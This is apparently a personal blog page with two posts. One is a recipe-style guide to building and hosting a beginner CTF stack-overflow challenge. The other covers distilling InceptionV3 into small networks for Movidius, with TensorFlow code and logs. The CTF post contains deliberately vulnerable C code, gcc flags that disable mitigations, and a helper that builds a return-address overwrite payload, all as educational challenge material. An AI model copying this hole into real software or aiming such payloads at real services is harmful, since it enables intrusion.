2018-10-08

My First Homemade PWN Challenge

October 27 is the SECCON CTF online qualifier!
Why not send a handmade PWN challenge to your coworkers and friends to show them your everyday gratitude?

Ingredients

★Docker: 1
xinetd: 1
★git: as needed
★gcc: 1
★Python2: 1
★pwntools: 1
★vim: 3
★Your favorite text editor: a pinch
Your favorite Linux distribution (ArchLinux is used here): 1

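Preparation

Apply updates to Linux and let them settle in with the package manager, then add the ★ ingredients and mix.
Check which distribution you are on and use the correct package manager for it each time.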

# Arch
sudo pacman -Syu && sudo pacman -S docker git gcc-multilib python2 vim python2-pip && sudo pip2 install pwntools

# Ubuntu
sudo apt update && sudo apt upgrade && sudo apt install docker-ce git gcc python2 vim python2-pip && sudo pip2 install pwntools

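Making the challenge

1. Prepare the dough

Decide what kind of dough to use, such as a buffer overflow or a format string attack.

2. Think about the method

Decide which technique the solver should use, such as shellcode or ROP, and choose the security mechanisms to match.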

CANARY
ASLR
PIE
RELRO
x86 or amd64

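3. Make it

Make it.

[One-point advice for a tasty result!]
1. Call fflush(stdout); before asking the user for input! Everything buffered by puts() and printf() gets written out, and the people solving your challenge will like you more!
2. Make the target function something other than main()! In a 32-bit build, gcc's main() restores the stack pointer from a value saved on the stack right before ret, so an overflow there wrecks esp and the program crashes before eip ever looks your way!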

#include <stdio.h>
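void print_flag(void) {
    // omitted
}
int in_name(void) {
    char name[16];
    printf("Type Your Name : ");
    fflush(stdout);       // flush the prompt before waiting for input
    scanf("%32s", name);  // intentional bug: up to 32 characters into a 16-byte buffer
    return 0;
}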
int main(void) {
    in_name();
    return 0;
}

4. Compile

Compile it.
[Caution!!] You use the compiler without a second thought in everyday programming, but when making a PWN challenge, choose its options carefully and with feeling!

mkdir bin
gcc pwn.c -o bin/pwn -m32 -O0 -fno-stack-protector -no-pie -fno-pie
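
As a rough aid for choosing options, the sketch below assembles a gcc command line from the mitigations you want left on or off. The helper name build_gcc_command and its keyword arguments are made up for illustration; the flags themselves are ordinary gcc and linker options. ASLR is not covered because it is a kernel setting, not a compiler flag.

```python
def build_gcc_command(source, output, *, x86=True, canary=False, pie=False,
                      nx=True, relro=True):
    """Return a gcc argument list for a deliberately weakened binary.

    Hypothetical helper: each keyword says whether that mitigation
    should stay enabled (True) or be switched off (False).
    """
    cmd = ["gcc", source, "-o", output]
    if x86:
        cmd.append("-m32")                  # build a 32-bit (x86) binary
    cmd.append("-O0")                       # no optimization, predictable stack layout
    if not canary:
        cmd.append("-fno-stack-protector")  # no stack canary
    if not pie:
        cmd += ["-no-pie", "-fno-pie"]      # fixed load address
    if not nx:
        cmd += ["-z", "execstack"]          # executable stack, for shellcode challenges
    if not relro:
        cmd.append("-Wl,-z,norelro")        # leave the GOT writable
    return cmd


if __name__ == "__main__":
    print(" ".join(build_gcc_command("pwn.c", "bin/pwn")))
```

With the defaults this reproduces the command above; passing nx=False would suit a shellcode-flavored dough.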

5. Done

The challenge is done!
Use pwntools to taste-test whether it can actually be attacked!
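
Before reaching for pwntools, it can help to check that a payload fits the challenge at all. The sketch below uses only the standard library; build_payload is a hypothetical helper, and both the offset (28) and the print_flag address are placeholder assumptions that you would read from your own binary (for example with a debugger or objdump). It enforces the two constraints that scanf("%32s") imposes: at most 32 bytes, and no whitespace bytes.

```python
import struct


def build_payload(offset, target_addr, max_len=32):
    """Pad up to the saved return address, then append a 32-bit little-endian address."""
    payload = b"A" * offset + struct.pack("<I", target_addr)
    if len(payload) > max_len:
        raise ValueError("payload is longer than the %32s limit")
    # scanf("%s") stops at whitespace, so such bytes would never reach the buffer
    if any(b in b" \t\n\v\f\r" for b in payload):
        raise ValueError("payload contains a whitespace byte")
    return payload


if __name__ == "__main__":
    OFFSET = 28              # assumption: distance from name[] to the return address
    PRINT_FLAG = 0x08049196  # assumption: address of print_flag() in your build
    print(build_payload(OFFSET, PRINT_FLAG))
```

The resulting bytes are what you would then send to the process with pwntools.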

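Setting up the runtime environment

The challenge itself is done at this point, but let's gift-wrap it so that it actually runs as a service!
This is starting to feel like a chore, but hang in there!

[Why build an environment at all?]
If a pwn challenge hands out root and people take root on your real machine, you'd be in trouble, right?
So you use Docker to build an environment where it's fine if root gets taken. Period. If you're only testing it yourself,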

socat TCP-LISTEN:8080,reuseaddr,fork EXEC:./pwn

is all you need.

1. Start the service

On Arch, do this.

sudo systemctl start docker.service

2. Prepare the config files

Download the config files:

git clone https://github.com/Eadom/ctf_xinetd

In ctf.xinetd, find the line server_args = --userspec=1000:1000 /home/ctf ./helloworld and replace helloworld with the name of your own executable.

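3. Build

Build it. Run this from the directory that contains the Dockerfile; the trailing dot is the build context.

sudo docker build -t "pwn" .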

4. Run

sudo docker run --rm -d -p "9999:9999" -h "pwn" --name="pwn" pwn

5. Check the connection

Yay, it's done!

Check the connection.

nc localhost 9999

Now run the pwntools script you wrote earlier, this time over the network.
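
If pwntools is not at hand, the same check can be sketched with the standard socket module. send_payload is a hypothetical helper; it assumes the service prints its prompt first, as the challenge above does after fflush(stdout), and it reads only one chunk of the reply.

```python
import socket


def send_payload(host, port, payload, timeout=3.0):
    """Connect, read the prompt, send one line, and return (prompt, reply)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        prompt = sock.recv(4096)        # e.g. b"Type Your Name : "
        sock.sendall(payload + b"\n")   # newline ends the scanf("%s") token
        try:
            reply = sock.recv(4096)     # empty if the service just closes
        except socket.timeout:
            reply = b""
    return prompt, reply

# Example against the container started above (port 9999):
#   prompt, reply = send_payload("localhost", 9999, b"A" * 8)
```

Swapping the harmless b"A" * 8 for a real payload is then the over-the-network taste test.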

Oh, YEAH !

2018-09-22

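Distilling InceptionV3 and running it on Movidius

This is too rough to be publishable.
I plan to upload it to GitHub once I've cleaned it up.

Trying distillation into a thrown-together CNN

The thrown-together CNN

Input: 299 x 299 x 3
Output: caltech101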

conv2d(299,299,3)
conv2d(,,32)
conv2d(, , 64)
conv2d(, , 128)
dense(625)
dropout
dense(101)
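
The student is trained on the teacher's temperature-softened outputs plus a down-weighted hard-label loss. The sketch below restates that loss in plain Python, using the values that appear in the source code later in this post (temperature 4, weight 0.2 on the hard-label term). The function names are made up for illustration, and this is a simplified reading of the TensorFlow code, not a copy of it.

```python
import math


def softmax(logits, temperature=1.0):
    """Numerically stable softmax of logits / temperature."""
    scaled = [z / temperature for z in logits]
    m = max(scaled)
    exps = [math.exp(z - m) for z in scaled]
    total = sum(exps)
    return [e / total for e in exps]


def cross_entropy(target, predicted, eps=1e-10):
    """-sum(target * log(predicted)), with predicted clipped away from zero."""
    return -sum(t * math.log(max(p, eps)) for t, p in zip(target, predicted))


def distillation_loss(teacher_logits, student_logits, onehot,
                      temperature=4.0, hard_weight=0.2):
    # Soft term: student vs. teacher, both softened by the same temperature
    soft = cross_entropy(softmax(teacher_logits, temperature),
                         softmax(student_logits, temperature))
    # Hard term: student vs. the true one-hot label, at temperature 1
    hard = cross_entropy(onehot, softmax(student_logits))
    return hard_weight * hard + soft


if __name__ == "__main__":
    print(distillation_loss([5.0, 1.0, 0.0], [4.0, 1.5, 0.2], [1, 0, 0]))
```

A higher temperature flattens both distributions, so the student also learns from the teacher's relative scores for the wrong classes.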

Results

Parent (teacher)

----------------------------------------------
EPOCH 3/3 

100%|██████████| 72/72 [00:29<00:00,  2.40it/s]
100%|██████████| 54/54 [00:06<00:00,  7.94it/s]

    loss: 0.8792 val accuracy: 0.8924

Child (student)

----------------------------------------------
EPOCH 30/30 

100%|██████████| 72/72 [00:17<00:00,  4.09it/s]
100%|██████████| 54/54 [00:03<00:00, 16.21it/s]

    loss: 7.9115 val accuracy: 0.4034

Child without distillation

----------------------------------------------
EPOCH 30/30 

100%|██████████| 72/72 [00:10<00:00,  6.81it/s]
100%|██████████| 54/54 [00:03<00:00, 15.68it/s]

    loss: 16.6656 val accuracy: 0.4259

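Distillation lost (0.4034 vs. 0.4259 validation accuracy).

Running on Movidius

mvNCProfile could measure the inference time alone.
For a 299 x 299 x 3 image it reports 130.27 ms per image.

Measured: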

Time : 58.298219442367554 (435 images)

That works out to about 134 ms per image.
In other words, loading the images accounts for only about 4 ms each.
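
As a quick check, the per-image time and the overhead follow directly from the two measurements above. The variable names are only for this illustration.

```python
total_seconds = 58.298219442367554   # measured wall-clock time for the whole loop
n_images = 435
profiled_ms = 130.27                 # per-image inference time reported by mvNCProfile

measured_ms = total_seconds / n_images * 1000.0
overhead_ms = measured_ms - profiled_ms

print("measured: {:.2f} ms/image".format(measured_ms))
print("overhead: {:.2f} ms/image".format(overhead_ms))
```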

Incidentally, the parameter count is 83M.
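
That figure can be reproduced by hand from the student network in the source code later in this post (four 3x3 convolutions with 32, 64, 128 and 256 filters, each followed by 2x2 max-pooling, then dense layers of 1000 and 101 units). The sketch assumes the convolutions keep the spatial size ('SAME' padding) and each pooling step halves it, rounding down; the helper names are made up.

```python
def conv_params(kernel, c_in, c_out):
    """Weights plus biases of a kernel x kernel convolution."""
    return kernel * kernel * c_in * c_out + c_out


def dense_params(n_in, n_out):
    """Weights plus biases of a fully connected layer."""
    return n_in * n_out + n_out


size, channels, total = 299, 3, 0
for filters in (32, 64, 128, 256):
    total += conv_params(3, channels, filters)
    channels = filters
    size //= 2                      # 299 -> 149 -> 74 -> 37 -> 18

flat = size * size * channels       # flattened feature size fed to fc1
total += dense_params(flat, 1000) + dense_params(1000, 101)
print(total)
```

Almost all of the parameters sit in the first dense layer, which is why swapping in a network with global pooling such as MobileNet shrinks the model so much.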

Summary

I fine-tuned InceptionV3, distilled it into another network, and got the result running on Movidius.

Having MobileNetV1 (224x224, a=1) learn from InceptionV3

Install nets from tensorflow/models:

python setup.py install

After that it can be imported:

import nets.mobilenet_v1

Then call

stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1()

The stu2_end_points it returns holds the details of MobileNet.
Looking inside it tells you quite a lot.

['Conv2d_0', 'Conv2d_1_depthwise', 'Conv2d_1_pointwise', 'Conv2d_2_depthwise', 'Conv2d_2_pointwise', 'Conv2d_3_depthwise', 'Conv2d_3_pointwise', 'Conv2d_4_depthwise', 'Conv2d_4_pointwise', 'Conv2d_5_depthwise', 'Conv2d_5_pointwise', 'Conv2d_6_depthwise', 'Conv2d_6_pointwise', 'Conv2d_7_depthwise', 'Conv2d_7_pointwise', 'Conv2d_8_depthwise', 'Conv2d_8_pointwise', 'Conv2d_9_depthwise', 'Conv2d_9_pointwise', 'Conv2d_10_depthwise', 'Conv2d_10_pointwise', 'Conv2d_11_depthwise', 'Conv2d_11_pointwise', 'Conv2d_12_depthwise', 'Conv2d_12_pointwise', 'Conv2d_13_depthwise', 'Conv2d_13_pointwise', 'AvgPool_1a', 'Logits', 'Predictions']

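You can specify the number of output units when building the model, but then it no longer matches the pretrained checkpoint, so you must not load the weights for the parts that changed.

For example, in the list above, Logits and Predictions look suspicious.

print("shape of logits: ", stu2_end_points['Logits'].shape)
print("shape of prediction: ", stu2_end_points['Predictions'].shape)

Check the shapes of the suspicious ones, and if they match the number of output units you specified, exclude them from the restore.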

mbnet_pretrained_include = ["MobilenetV1"]
mbnet_pretrained_exclude = ["MobilenetV1/Predictions", "MobilenetV1/Logits"]
mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=mbnet_pretrained_include, exclude=mbnet_pretrained_exclude)
mbnet_pretrained_saver = tf.train.Saver(
    mbnet_pretrained_vars, name="mobilenet_pretrained_saver")
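
To see what the include/exclude lists select, here is a plain-Python imitation of the effect. It is not the TensorFlow implementation: select_variables is a made-up helper that treats each scope as a name prefix, and the variable names in the list are illustrative.

```python
def select_variables(names, include, exclude):
    """Keep names under any include scope unless they fall under an exclude scope."""
    def under(name, scope):
        return name == scope or name.startswith(scope.rstrip("/") + "/")

    return [n for n in names
            if any(under(n, s) for s in include)
            and not any(under(n, s) for s in exclude)]


names = [  # illustrative variable names
    "MobilenetV1/Conv2d_0/weights",
    "MobilenetV1/Conv2d_0/BatchNorm/moving_mean",
    "MobilenetV1/Logits/Conv2d_1c_1x1/weights",
    "MobilenetV1/Logits/Conv2d_1c_1x1/biases",
]
kept = select_variables(
    names,
    include=["MobilenetV1"],
    exclude=["MobilenetV1/Predictions", "MobilenetV1/Logits"],
)
print(kept)
```

Only the backbone variables survive, so the resized output layer keeps its fresh initialization.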

Trying it

Parent (teacher)

----------------------------------------------
EPOCH 30/30 

100%|██████████| 72/72 [00:16<00:00,  4.35it/s]
100%|██████████| 54/54 [00:03<00:00, 13.75it/s]

    loss: 0.0003 val accuracy: 0.8582

Child (student)

----------------------------------------------
EPOCH 72/300 

100%|██████████| 72/72 [00:17<00:00,  4.01it/s]
100%|██████████| 54/54 [00:02<00:00, 23.67it/s]

    loss: 6.1732 val accuracy: 0.4126

Converting for Movidius

Running mvNCCompile gives:

FailedPreconditionError (see above for traceback): Attempting to use uninitialized value MobilenetV1/Conv2d_0/BatchNorm/moving_mean

The Saver used for the conversion was only saving trainable variables, so I switched it to tf.global_variables(), which then gave:

NotFoundError: Key MobilenetV1/Conv2d_0/BatchNorm/moving_mean not found in checkpoint

So the variable was already missing from the checkpoint at the time it was saved.
I therefore changed the original training script to save tf.global_variables() as well.

[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found preprocess/rescaled_inputs

[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found mbnet_struct/truediv

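Now it fails with a different error.
Maybe div is not supported?

For the former, I decided to divide the input by 255 beforehand and feed that in.
The latter wasn't being used.

Removed both and re-ran: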

tokunn@nanase 9:00:09 [~/Documents/distil_incep2mbnet0921] $ python3 movidius.py /home/tokunn/caltech101/butterfly 2>/dev/null
Image path : /home/tokunn/caltech101/butterfly/*.jpg or *.png
['image_0032.jpg', 'image_0073.jpg', 'image_0017.jpg', 'image_0089.jpg', 'image_0085.jpg', 'image_0078.jpg', 'image_0056.jpg', 'image_0069.jpg', 'image_0074.jpg', 'image_0025.jpg']
imgshape  (91, 224, 224)
Start predicting ...
butterfly Faces butterfly chandelier butterfly Faces chandelier butterfly butterfly butterfly butterfly revolver butterfly butterfly revolver butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly sunflower revolver butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly Faces butterfly Faces butterfly butterfly butterfly Faces butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier cellphone butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly 
Time : 3.817107915878296 (91 images)

Wonderful!

Source code

Thrown-together CNN edition

Parent and child (teacher and student)

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
#from __future__ import print_function, division
import loadimg_caltech as loadimg
from tqdm import tqdm
import matplotlib.pyplot as plt

start = time.time()


# In[2]:


np_aryname = './models/data{0}.npy'
    
try: # LOAD
    X_train = np.load(np_aryname.format('X_train'))
    Y_train = np.load(np_aryname.format('Y_train'))
    X_test = np.load(np_aryname.format('X_test'))
    Y_test = np.load(np_aryname.format('Y_test'))
    number_of_classes = np.load(np_aryname.format('number_of_classes')).item()  # np.asscalar is removed in newer NumPy
    
except FileNotFoundError:
    print("### Load from Images ###")
    X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg(
        '/home/tokunn/caltech101')

    np.save(np_aryname.format('X_train'), X_train)
    np.save(np_aryname.format('Y_train'), Y_train)
    np.save(np_aryname.format('X_test'), X_test)
    np.save(np_aryname.format('Y_test'), Y_test)
    np.save(np_aryname.format('number_of_classes'), number_of_classes)


print("X_train", X_train.shape)
print("Y_train", Y_train.shape)
print("X_test", X_test.shape)
print("Y_test", Y_test.shape)
print("Number of Classes", number_of_classes)


# In[3]:


SNAPSHOT_FILE = "./models/snapshot.ckpt"
STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
#[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = number_of_classes                    # Change N_CLASSES to suit your needs

temperature = 4


# In[4]:


def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False):
    with tf.variable_scope(scope, reuse = reuse) as sc:
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                                      
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)
            
            net = slim.conv2d(net, 256,scope='conv4')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')
            net = tf.nn.dropout(net, keep_prob_conv)
    
            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,1000,scope='fc1') # 625
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
            
            #net = tf.nn.softmax(net/temperature)
            return net


# In[5]:


def loss(prediction,output):#,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        tf.cast(output, tf.float32) * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy#,accuracy


# In[6]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        tf_Y = tf.placeholder(tf.int32, shape=[None, N_CLASSES], name="Y")
        tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha")
        tf_is_training = tf.placeholder_with_default(False, shape=None,
                                                     name="is_training")
        stu_keep_prob_conv = tf.placeholder(tf.float32)
        stu_keep_prob_hidden = tf.placeholder(tf.float32)
        
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # BODY
    arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=tf_is_training,
            dropout_keep_prob=0.8)
        
    with tf.name_scope("softmax") as scope:
        tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax")
        tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual")
        
        
    # Student     
    stu_logits = NetworkStudent(tf_X, stu_keep_prob_conv,
                               stu_keep_prob_hidden, scope='student')
    with tf.name_scope("stu_struct"):
        # softmax
        stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
        stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")
        
        
    # Separate vars
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'InceptionV3' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]
   

    # PREDICTIONS
    tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds")

    # LOSS - Sums all losses (even Regularization losses)
    with tf.variable_scope('loss') as scope:
        #unrolled_labels = tf.reshape(tf_Y, (-1,))
        #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels,
        
        tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits)
        tf_loss = tf.losses.get_total_loss()
        
        #tf_loss = loss(tch_y_actual, tf_Y)

    # OPTIMIZATION - Also updates batchnorm operations automatically
    with tf.variable_scope('opt') as scope:
        #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm
        #with tf.control_dependencies(update_ops):
        #    tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op")
        
        grad_teacher = tf.gradients(tf_loss, var_teacher)
        tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher))
            
    # Evaluation
    with tf.variable_scope('eval') as scope:
        y = tf.nn.softmax(tf_logits, name='softmax')
        accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )
        
    # PRETRAINED SAVER SETTINGS
    # Lists of scopes of weights to include/exclude from pretrained snapshot
    pretrained_include = ["InceptionV3"]
    pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"]

    # PRETRAINED SAVER - For loading pretrained weights on the first run
    pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=pretrained_include,
        exclude=pretrained_exclude)
    tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver")

    
         
    # Student
    with tf.name_scope("stu_train"):
        # loss
        tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits)
        stu_loss1 = tf.losses.get_total_loss()
        #stu_loss1 = loss(stu_y_actual, tf_Y)
        stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log(
            tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1))
        stu_loss = 0.2 * stu_loss1 + stu_loss2
        #stu_loss = stu_loss1
       
        # optimization
        grad_student = tf.gradients(stu_loss,var_student)
        stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002)
        #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #stu_trainer = tf.train.AdadeltaOptimizer()
        train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student))
        #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer")
        #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op")
        # evaluation
        stu_accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )

        
    
    # MAIN SAVER - For saving/restoring your complete model
    tf_saver = tf.train.Saver(var_teacher, name="saver")
    
    # STUDENT SAVER
    
    stu_saver = tf.train.Saver(var_student, name="stu_saver")

    # TENSORBOARD - To visualize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[7]:


def initialize_vars(session):
    # INITIALIZE VARS
    LOAD_FROM_CHECKPOINT = False
    if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE):
        print(" Loading from Main Checkpoint")
        session.run(tf.global_variables_initializer())
        tf_saver.restore(session, SNAPSHOT_FILE)
    else:
        print("Initializing from Pretrained Weights")
        session.run(tf.global_variables_initializer())
        tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE)


# In[ ]:


with tf.Session(graph=graph) as sess:
    n_epochs = 5
    batch_size = 32 # small batch size so inception v3 can be run on laptops
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size

    initialize_vars(session=sess)

    print("##### Teacher Training Section #####")
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: True}
            #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict)
            tf_train_step.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evaluation
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: False}            
            val_accuracy.append(accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEEDBACK - once per epoch
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([tch_y, tf_loss], feed_dict = {
            tf_X: [X_test[5]],
            tf_Y: [Y_test[5]],
            tf_is_training: False
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
       
        # SAVE SNAPSHOT - after each epoch
        tf_saver.save(sess, SNAPSHOT_FILE)
        

    print("### Student Training Section ###")
    n_epochs = 300
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         #tf_alpha:0.001,
                         stu_keep_prob_conv: 0.8,
                         stu_keep_prob_hidden: 0.5}
            #loss, _ = sess.run(stu_loss, feed_dict=feed_dict)
            train_step_student.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evaluation
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         #tf_alpha:0.001,
                         stu_keep_prob_conv: 1.0,
                         stu_keep_prob_hidden: 1.0}      
            val_accuracy.append(stu_accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEEDBACK - once per epoch
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([stu_logits, stu_loss], feed_dict = {
            tf_X: X_batch,
            tf_Y: Y_batch,
            #tf_alpha:0.001,
            stu_keep_prob_conv: 1.0,
            stu_keep_prob_hidden: 1.0
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
        
        stu_saver.save(sess, STU_SNAPSHOT_FILE)
            
            
            
        
     


# In[ ]:


end = time.time()
print("Time : {0}".format(end-start))



For conversion

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim


# In[2]:


STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
STU_FLOZEN_FILE = "./models/student_flozen.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = 101                    # Change N_CLASSES to suit your needs

temperature = 4


# In[3]:


def NetworkStudent(input,scope='Student', reuse = False):
    with tf.variable_scope(scope, reuse = reuse) as sc:
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                                      
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            
            net = slim.conv2d(net, 256,scope='conv4')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')
    
            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,1000,scope='fc1') # 625
            net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
